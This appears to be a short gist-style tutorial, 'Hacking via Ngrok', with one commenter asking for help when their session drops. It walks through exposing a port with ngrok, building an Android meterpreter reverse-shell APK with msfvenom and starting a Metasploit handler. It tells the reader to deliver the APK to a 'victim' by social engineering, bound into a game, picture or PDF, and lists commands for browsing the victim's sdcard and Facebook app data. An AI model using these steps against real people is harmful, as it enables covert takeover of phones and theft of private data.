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Last active August 24, 2023 19:48
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Hacking via Ngrok

Hacking via Ngrok

Step1: download and configure the ngrok and move it to usr/bin/ in kali linux
Setp2: ngrok tcp 4444   [o/p: Forwarding  tcp:// -> localhost:4444  ]
Step3: create payload using msfvenom e.g.
-> msfvenom -p android/meterpreter/reverse_tcp LPORT=14621 R> /var/www/html/payload.apk or if port forwarded
  -> msfvenom -p android/meterpreter/reverse_tcp LHOST=router_external_ip( LPORT=forwarded_port_of_router(mine:3000) R> /var/www/html/payload.apk
Note: after generation of the payload you need to send it to the victim via any social engineering delivery method (e.g. binding with game, picture, pdf or via direct link)

Step4: open metasploit console by runing msfconsole
then run the below commands:
-> use exploit/multi/handler
-> set payload android/meterpreter/reverse_tcp
-> show options
-> set LHOST OR (mine kali ip:
-> set LPORT 4444 (mine kali's port: 3000 forwarded by router)
-> show options
-> exploit

post exploit commands:
->cd /
->ls -l
->cd sdcard
->ls -l
->cd com.facebook.katana
->ls -l
->cd fb_temp
->ls -l
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exploit (1)

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i did every thing and it says session is not valid
and will be closed help pls

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